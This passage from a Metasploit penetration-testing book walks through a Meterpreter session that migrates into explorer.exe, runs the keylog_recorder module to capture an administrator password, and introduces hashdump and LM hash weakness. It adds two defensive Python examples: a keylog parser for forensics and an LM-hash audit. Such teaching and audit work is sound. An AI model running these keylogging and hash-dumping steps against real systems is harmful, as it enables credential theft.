Chapter 6

 1476  spoolsv.exe    x86    0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\spoolsv.exe
 1668  explorer.exe   x86    0        IHAZSECURITY\Administrator    C:\WINDOWS\Explorer.EXE
 . . . SNIP . . .
 4032  notepad.exe    x86    0        IHAZSECURITY\Administrator    C:\WINDOWS\system32\notepad.exe

meterpreter > migrate 1668
[*] Migrating to 1668...
[*] Migration completed successfully.
meterpreter > run post/windows/capture/keylog_recorder
[*] Executing module against V-MAC-XP
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf3/loot/20110324171334_default_192.168.1.195_host.windows.key_179703.txt
[*] Recording keystrokes...
[*] Saving last few keystrokes...

root@bt:~# cat /root/.msf3/loot/20110324171334_default_192.168.1.195_host.windows.key_179703.txt
Keystroke log started at Thu Mar 24 17:13:34 -0600 2011

administrator password <Back>  <Back>  <Back>  <Back>  <Back>  <Back>  <Back>  <Tab> password123!!

Executing ps provides a list of running processes, including explorer.exe. We then issue the migrate command to move our session into the explorer.exe process space. Once that move is complete, we start the keylog_recorder module, stopping it after some time with CTRL-C, and finally, in another terminal window, we dump the contents of the keystroke logger to see what we've caught.
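The loot file above is written as literal characters interleaved with bracketed key names such as <Back> and <Tab>. When an incident responder recovers such a file from a compromised host, the first job is to work out what the victim actually typed, which means applying the editing keys rather than reading the raw line. The following Python is an added example for that forensic step; it is not part of the book or of the Metasploit project. It assumes the token names shown in the log (<Back> deletes one character, <Tab> and <Return> move to the next input field) and assumes that whitespace bordering a token is padding written by the logger rather than a typed space; the sample log is constructed from the listing above.

```python
"""Reconstruct typed text from a keylog_recorder-style keystroke log (added example)."""
import re
from typing import Dict, List

# Constructed sample modelled on the loot file shown above; not real captured data.
SAMPLE_LOG = """Keystroke log started at Thu Mar 24 17:13:34 -0600 2011

administrator password <Back>  <Back>  <Back>  <Back>  <Back>  <Back>  <Back>  <Tab> password123!!
"""

# A special key such as <Back>, together with the padding the logger is assumed to write around it.
TOKEN_RE = re.compile(r"\s*<([A-Za-z]+)>\s*")


def tokenize(line: str) -> List[str]:
    """Split a log line into single literal characters and special-key tokens like '<Back>'."""
    tokens: List[str] = []
    pos = 0
    for m in TOKEN_RE.finditer(line):
        tokens.extend(line[pos:m.start()])  # literal characters, one token each
        tokens.append("<%s>" % m.group(1))  # the special key, without its padding
        pos = m.end()
    tokens.extend(line[pos:])
    return tokens


def reconstruct(line: str) -> List[str]:
    """Apply editing keys and return the resulting text of each input field.

    <Back> removes the previous character of the current field, <Tab> and
    <Return> start a new field, and any other <Key> token is kept literally so
    the analyst can still see it in the output.
    """
    fields: List[List[str]] = [[]]
    for tok in tokenize(line):
        if tok == "<Back>":
            if fields[-1]:
                fields[-1].pop()
        elif tok in ("<Tab>", "<Return>"):
            fields.append([])
        else:
            fields[-1].append(tok)
    return ["".join(f) for f in fields]


def parse_keylog(text: str) -> Dict[str, object]:
    """Parse a whole log: the header timestamp plus the reconstructed fields of every non-empty line."""
    lines = text.splitlines()
    started = None
    header = "Keystroke log started at "
    if lines and lines[0].startswith(header):
        started = lines[0][len(header):]
        lines = lines[1:]
    entries = [reconstruct(line) for line in lines if line.strip()]
    return {"started": started, "entries": entries}


if __name__ == "__main__":
    result = parse_keylog(SAMPLE_LOG)
    print("log started:", result["started"])
    for fields in result["entries"]:
        print("fields typed:", fields)
```

On the sample line the seven <Back> tokens delete most of the word "password" typed into the first field before the <Tab>, so the parser reports the fields `['administrator p', 'password123!!']`; the second field is the credential the text above says was captured. The whitespace assumption matters: if the logger wrote typed spaces as plain spaces too, the first field would differ by one character, so check the recording module's version before trusting field boundaries in a real investigation.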

Dumping Usernames and Passwords

In the preceding example, we grabbed password hashes by logging what a user typed. We can also use Meterpreter to obtain the usernames and password hashes on a local file system without the use of keyloggers.

Extracting the Password Hashes

In this attack, we'll leverage the hashdump post-exploitation module in Meterpreter to extract the username and password hashes from the system. Microsoft typically stores hashes as LAN Manager (LM), NT LAN Manager (NTLM), and NT LAN Manager v2 (NTLMv2).
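The LM scheme this section goes on to describe is weak because of its structure: the password is upper-cased, cut or zero-padded to 14 bytes and split into two 7-byte halves, each of which is hashed on its own. The Python below is an added example, not code from the book or from Metasploit, that shows that split and turns it into a check a defender can run over a hash export: any account whose second LM half equals the well-known hash of an empty half (AAD3B435B51404EE) has a password of seven characters or fewer, and any account whose LM field is anything other than the empty-password value still has LM storage enabled. The DES step that produces the 8 hash bytes per half is omitted; the `user:rid:lm_hash:nt_hash:::` line layout is an assumption, and the sample lines are constructed (the NT hashes are placeholders except the well-known empty-password NT hash 31D6CFE0D16AE931B73C59D7E0C089C0).

```python
"""LM hash structure and an audit of dumped LM hashes (added example)."""
from typing import List, NamedTuple, Tuple

EMPTY_LM_HALF = "AAD3B435B51404EE"  # LM hash of a 7-byte all-zero (empty) half
EMPTY_LM_HASH = EMPTY_LM_HALF * 2   # LM field of an empty password or of an account with LM storage disabled

# Constructed sample in the assumed pwdump layout; hash values are placeholders.
SAMPLE_DUMP = [
    "Administrator:500:0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210:::",
    "svc_backup:1001:0123456789ABCDEFAAD3B435B51404EE:0011223344556677889900AABBCCDDEE:::",
    "Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::",
    "garbage line without fields",
]


def lm_halves(password: str) -> Tuple[bytes, bytes]:
    """Return the two 7-byte inputs LM hashes independently.

    LM upper-cases the OEM-encoded password, truncates it to 14 bytes and
    zero-pads anything shorter, so 'password123456' becomes b'PASSWOR' and
    b'D123456' and a 3-character password has an all-zero second half.
    """
    raw = password.upper().encode("cp437", errors="replace")[:14].ljust(14, b"\x00")
    return raw[:7], raw[7:]


class LmFinding(NamedTuple):
    user: str
    lm_stored: bool       # LM field differs from the empty-password value
    short_password: bool  # second half is the empty half, so the password is at most 7 characters


def audit_hashdump(lines: List[str]) -> List[LmFinding]:
    """Audit lines in the assumed user:rid:lm_hash:nt_hash::: layout; malformed lines are skipped."""
    findings: List[LmFinding] = []
    for line in lines:
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue
        user, lm = parts[0], parts[2].upper()
        if len(lm) != 32:
            continue
        lm_stored = lm != EMPTY_LM_HASH
        short = lm_stored and lm[16:] == EMPTY_LM_HALF
        findings.append(LmFinding(user, lm_stored, short))
    return findings


def accounts_needing_attention(lines: List[str]) -> List[str]:
    """Names of accounts that still have an LM hash stored (candidates for a forced password change)."""
    return [f.user for f in audit_hashdump(lines) if f.lm_stored]


if __name__ == "__main__":
    print(lm_halves("password123456"))
    for finding in audit_hashdump(SAMPLE_DUMP):
        print(finding)
```

The remediation that follows from the audit is to stop LM hashes from being stored at all (the "Do not store LAN Manager hash value on next password change" policy) and to force a password change for every account the check lists, since the LM hash persists until the password is changed.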

In the case of LM, for example, when a user enters a password for the first time or changes a password, the password is assigned a hash value. Depending on the hash value length, the password can be split into seven-character hashes. For example, if the password is password123456, the hash value could be stored as passwor and d123456, so an attacker would simply need to crack